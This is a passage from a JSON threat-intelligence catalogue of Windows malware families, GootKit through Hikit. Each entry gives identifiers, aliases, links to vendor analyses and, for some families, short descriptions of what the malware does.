"https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" ], "synonyms": [ "Waldek", "Xswkit", "talalpek" ], "type": [] }, "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", "value": "GootKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe", "https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques", "https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville" ], "synonyms": [], "type": [] }, "uuid": "fb2e42bf-6845-4eb3-9fe7-85a447762bce", "value": "Gophe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", "https://www.yumpu.com/en/document/view/55930175/govrat-v20" ], "synonyms": [], "type": [] }, "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", "value": "GovRAT" }, { "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", "https://www.secureworks.com/research/gozi", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://github.com/mlodic/ursnif_beacon_decryptor", "https://lokalhost.pl/gozi_tree.txt", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://www.youtube.com/watch?v=BcFbkjUVc7o", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], "synonyms": [ "CRM", "Gozi CRM", "Papras", "Snifula", "Ursnif" ], "type": [] }, "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", "value": "Gozi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", "https://de.securelist.com/analysis/59479/erpresser/", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" ], "synonyms": [], "type": [] }, "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", "value": "GPCode" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" ], "synonyms": [], "type": [] }, "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", "value": "GrabBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" ], "synonyms": [], "type": [] }, "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", "value": "Graftor" }, { "description": "According to ESET Research, Grandoreirois a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro", "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks" ], "synonyms": [], "type": [] }, "uuid": "c62219e2-74a3-49c2-a33d-0789b820c467", "value": "Grandoreiro" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandsteal", "http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html" ], "synonyms": [], "type": [] }, "uuid": "626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14", "value": "GrandSteal" }, { "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html" ], "synonyms": [ "FrameworkPOS", "SCRAPMINT", "trinity" ], "type": [] }, "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", "value": "Grateful POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem" ], "synonyms": [], "type": [] }, "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", "value": "Gratem" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://securelist.com/gravityrat-the-spy-returns/99097/", "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" ], "synonyms": [], "type": [] }, "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", "value": "Gravity RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease", "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" ], "synonyms": [], "type": [] }, "uuid": "4ed079e6-69bd-481b-b873-86ced9ded750", "value": "GREASE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", "https://blog.cylance.com/spear-a-threat-actor-resurfaces" ], "synonyms": [ "eoehttp" ], "type": [] }, "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", "https://www.eset.com/int/greyenergy-exposed/", "https://www.secureworks.com/research/threat-profiles/iron-viking", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", "https://github.com/NozomiNetworks/greyenergy-unpacker" ], "synonyms": [], "type": [] }, "uuid": "5a683d4f-31a1-423e-a136-d348910ca967", "value": "GreyEnergy" }, { "description": "This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system's proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark", "https://content.fireeye.com/m-trends/rpt-m-trends-2019", "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/" ], "synonyms": [ "Hellsing Backdoor" ], "type": [] }, "uuid": "60cc0c72-e903-4dda-967a-9da0e12d4ac5", "value": "GRILLMARK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent", "https://twitter.com/bryceabdo/status/1352359414746009608" ], "synonyms": [], "type": [] }, "uuid": "57460bae-84ad-402d-8949-9103c5917703", "value": "GRIMAGENT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok" ], "synonyms": [], "type": [] }, "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt", "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", "https://twitter.com/ItsReallyNick/status/1208141697282117633" ], "synonyms": [], "type": [] }, "uuid": "884782cf-9fdc-4f3c-8fba-e878330d0ef5", "value": "GRUNT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", "https://attack.mitre.org/wiki/Technique/T1003" ], "synonyms": [], "type": [] }, "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", "value": "gsecdump" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy", "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks" ], "synonyms": [], "type": [] }, "uuid": "83d1bf1b-6557-4c2e-aa00-53013be73067", "value": "GUP Proxy Tool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" ], "synonyms": [], "type": [] }, "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", "value": "H1N1 Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", "value": "Hacksfase" }, { "description": "Py2Exe based tool as found on github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", "https://github.com/ratty3697/HackSpy-Trojan-Exploit" ], "synonyms": [], "type": [] }, "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, { "description": "Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server.\r\nThe ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.\r\n\r\nContact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent \"KiraLock\" has kiraransom@ (among others of course).\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://unit42.paloaltonetworks.com/thanos-ransomware/", "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf", "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/", "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/" ], "synonyms": [ "Thanos Ransomware" ], "type": [] }, "uuid": "18617856-c6c4-45f8-995f-4916a1b45b05", "value": "Hakbit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/", "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf", "https://www.youtube.com/watch?v=JPvcLLYR0tE", "https://www.youtube.com/watch?v=FAFuSO9oAl0" ], "synonyms": [], "type": [] }, "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", "value": "Hamweq" }, { "description": "Hancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", "https://twitter.com/TheDFIRReport/status/1359669513520873473", "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", "https://www.uperesia.com/hancitor-packer-demystified", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/" ], "synonyms": [ "Chanitor" ], "type": [] }, "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", "value": "Hancitor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" ], "synonyms": [], "type": [] }, "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", "value": "HappyLocker (HiddenTear?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" ], "synonyms": [], "type": [] }, "uuid": "e4948b4c-be46-44a4-81e6-3b1922448083", "value": "HARDRAIN (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" ], "synonyms": [ "Piptea" ], "type": [] }, "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", "value": "Harnig" }, { "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.secureworks.com/research/threat-profiles/iron-liberty", "https://www.f-secure.com/weblog/archives/00002718.html" ], "synonyms": [], "type": [] }, "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", "value": "Havex RAT" }, { "description": "HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball", "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html" ], "synonyms": [], "type": [] }, "uuid": "dc07507b-959f-4521-be0f-b9ff2b32b909", "value": "HAWKBALL" }, { "description": "HawKeye is a keylogger that is distributed since 2013. Discovered by IBM X-Force, it is currently spread over phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new \"loader capabilities\" have been spotted. It is sold by its development team on dark web markets and hacking forums.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/", "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", "https://www.secureworks.com/research/threat-profiles/gold-galleon", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/", "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html", "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ "HawkEye", "HawkEye Reborn", "Predator Pain" ], "type": [] }, "uuid": "31615066-dbff-4134-b467-d97a337b408b", "value": "HawkEye Keylogger" }, { "description": "HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: \"!!! READ THIS !!!.hta\".", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr", "http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html", "https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1" ], "synonyms": [ "GO-SPORT" ], "type": [] }, "uuid": "d643273f-7a53-4703-bf65-95716d55a5dd", "value": "HDMR Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdroot", "https://securelist.com/i-am-hdroot-part-1/72275/", "https://securelist.com/i-am-hdroot-part-2/72356/" ], "synonyms": [], "type": [] }, "uuid": "af8df5d7-cd8c-41ea-b9ec-b69ab7811e2d", "value": "HDRoot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", "value": "Helauto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty", "https://twitter.com/fwosar/status/1359167108727332868", "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html", "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/", "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks" ], "synonyms": [ "KittyCrypt" ], "type": [] }, "uuid": "433c97b5-89ac-4783-a312-8bb890590ff0", "value": "HelloKitty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], "synonyms": [], "type": [] }, "uuid": "19d89300-ff97-4281-ac42-76542e744092", "value": "Helminth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/" ], "synonyms": [], "type": [] }, "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", "value": "Heloag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" ], "synonyms": [], "type": [] }, "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", "value": "Herbst" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", "value": "Heriplor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [], "type": [] }, "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", "value": "Hermes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://blog.dcso.de/enterprise-malware-as-a-service/", "https://www.youtube.com/watch?v=9nuo-AGg4p4", "https://dcso.de/2019/03/18/enterprise-malware-as-a-service", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], "type": [] }, "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", "value": "Hermes Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" ], "synonyms": [], "type": [] }, "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", "value": "HerpesBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" ], "synonyms": [], "type": [] }, "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", "value": "HesperBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee", "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/", "https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/", "https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/", "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/", "https://www.freebuf.com/column/174581.html", "https://www.freebuf.com/column/175106.html" ], "synonyms": [], "type": [] }, "uuid": "f1e4862e-75a3-4843-add3-726a6535019c", "value": "Hidden Bee" }, { "description": "HiddenTear is an open source ransomware developed by a Turkish programmer and later released as proof of concept on GitHub. The malware generates a local symmetric key in order to encrypt a configurable folder (/test was the default one) and it sends it to a centralized C&C server. Due to its small payload it was used as real attack vector over email phishing campaigns. Variants are still used in attacks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", "https://twitter.com/struppigel/status/950787783353884672", "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/", "https://twitter.com/JAMESWT_MHT/status/1264828072001495041", "https://github.com/goliate/hidden-tear", "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring", "https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html" ], "synonyms": [ "FuckUnicorn" ], "type": [] }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", "value": "HiddenTear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" ], "synonyms": [], "type": [] }, "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", "value": "HideDRV" }, { "description": "According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon", "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", "https://twitter.com/MrDanPerez/status/1159461995013378048", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://content.fireeye.com/apt-41/rpt-apt41/" ], "synonyms": [], "type": [] }, "uuid": "f04c5821-311f-44c9-9d6c-0fe3fd3a1336", "value": "HIGHNOON" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon_bin", "https://content.fireeye.com/apt-41/rpt-apt41/" ], "synonyms": [], "type": [] }, "uuid": "0a86eb46-28b5-4797-af63-75f9b2ef9080", "value": "HIGHNOON.BIN" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote", "https://twitter.com/bkMSFT/status/1153994428949749761" ], "synonyms": [ "ChyNode" ], "type": [] }, "uuid": "d9f03a69-507d-4b1d-af6d-e76fca5952b7", "value": "HIGHNOTE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", "https://www.recordedfuture.com/hidden-lynx-analysis/", "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [], "type": [] }, "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", "value": 